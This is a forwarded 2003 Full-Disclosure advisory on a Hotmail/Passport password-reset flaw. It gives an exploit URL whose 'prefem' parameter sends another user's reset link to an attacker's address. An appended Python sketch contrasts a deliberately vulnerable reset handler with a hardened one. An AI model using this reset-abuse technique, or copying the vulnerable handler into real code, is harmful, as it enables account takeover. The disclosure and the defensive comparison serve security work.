
[Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability



<html><div style='background-color:'><DIV>
<DIV>
<DIV>
<DIV>
<DIV>
<DIV>
<DIV>
<DIV>
<DIV>I am forwarding this as it may impact people who depend on MSN 
or passport systems for business reasons. Contrary to what at least one 
of the full-disclosure follow-ups reports, it does work.<BR><BR>D<BR></DIV>
<DIV>---------- Forwarded message ----------<BR>Date: Wed, 7 May 2003 19:50:51 
-0700 (PDT)<BR>From: Muhammad Faisal Rauf Danka &lt;MFRD@xxxxxxxxxxxxx&gt;<BR>To: 
full-disclosure@xxxxxxxxxxxxxxxx<BR>Subject: [Full-Disclosure] Hotmail &amp; 
Passport (.NET Accounts) Vulnerability<BR><BR>Hotmail &amp; Passport (.NET 
Accounts) Vulnerability<BR><BR>There is a very serious and stupid vulnerability 
or bad coding in Hotmail / Passport's (.NET Accounts)<BR><BR>I tried 
sending emails several times to Hotmail / Passport contact addresses, but 
always met with the NLP bots.<BR><BR>I guess I don't need to go into details 
of how crucial and important Hotmail / Passport's .NET Account passport is 
to anyone.<BR><BR>You name it and they have it, E-Commerce, Credit Card 
processing, Personal Emails, Privacy Issues, Corporate Espionage, maybe 
stalkers and what not.<BR><BR>It is so simple that it is funny.<BR><BR>All you 
got to do is hit the following in your browser:<BR><BR><A href="https://register.passport.net/emailpwdreset.srf?lc=1033&amp;em=pablo_david_d@xxxxxxxxxxx&amp;id=&amp;cb=&amp;prefem=naty_nenalinda@xxxxxxxxxxx&amp;rst=1">https://register.passport.net/emailpwdreset.srf?lc=1033&amp;em=pablo_david_d@xxxxxxxxxxx&amp;id=&amp;cb=&amp;prefem=naty_nenalinda@xxxxxxxxxxx&amp;rst=1</A><BR><BR>And
 you'll get an email on <A 
href="mailto:naty_nenalinda@xxxxxxxxxxxxxxx">naty_nenalinda@xxxxxxxxxxxxxxx</A> 
asking you to click on a url something 
like this:<BR><BR>http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&amp;URLNum=0&amp;lc=1033<BR><BR>From
 that url, you can reset the password and I don't think I need to say 
anything more about it.<BR><BR>Vulnerability / Flaw discovered : 12th April 
2003<BR>Vendor / Owner notified : Yes (as far as emailing them more than 10 
times is concerned)<BR><BR><BR>Regards<BR>--------<BR>Muhammad Faisal Rauf 
Danka </DIV></DIV></DIV></DIV></DIV></DIV></DIV></DIV></DIV></div>
</html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
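
As the forwarded message reports, the reset request names both the account (em) and the address the reset link is mailed to (prefem). The sketch below is an added example, not code from the original post or from the vendor: a constructed handler that trusts prefem beside one that mails only the recovery address held server-side. All function names, the in-memory stores and the sample addresses are assumptions.

```python
import hashlib
import secrets
import time

# Constructed sample data (assumption): account -> recovery address set by the owner.
ACCOUNTS = {"alice@example.com": {"recovery": "alice.alt@example.org"}}
TOKENS = {}      # sha256(token) -> (account, expiry); raw tokens are never stored
OUTBOX = []      # (recipient, token) pairs, standing in for a mail queue
TOKEN_TTL = 900  # seconds a reset link stays valid


def _issue(account, recipient, now):
    """Create a random reset token and queue it for delivery to recipient."""
    token = secrets.token_urlsafe(32)
    digest = hashlib.sha256(token.encode()).hexdigest()
    TOKENS[digest] = (account, now + TOKEN_TTL)
    OUTBOX.append((recipient, token))
    return token


def reset_vulnerable(params, now=None):
    """Flawed pattern: the delivery address is taken from the request itself."""
    now = time.time() if now is None else now
    if params.get("em") not in ACCOUNTS:
        return None
    return _issue(params["em"], params["prefem"], now)


def reset_hardened(params, now=None):
    """The delivery address comes only from the server-side account record;
    any prefem value in the request is ignored."""
    now = time.time() if now is None else now
    record = ACCOUNTS.get(params.get("em"))
    if record is None:
        return None  # the HTTP response should look the same either way
    return _issue(params["em"], record["recovery"], now)


def redeem(token, now=None):
    """Single use: the token is deleted on first presentation, valid or expired."""
    now = time.time() if now is None else now
    entry = TOKENS.pop(hashlib.sha256(token.encode()).hexdigest(), None)
    if entry is None or now > entry[1]:
        return None
    return entry[0]
```
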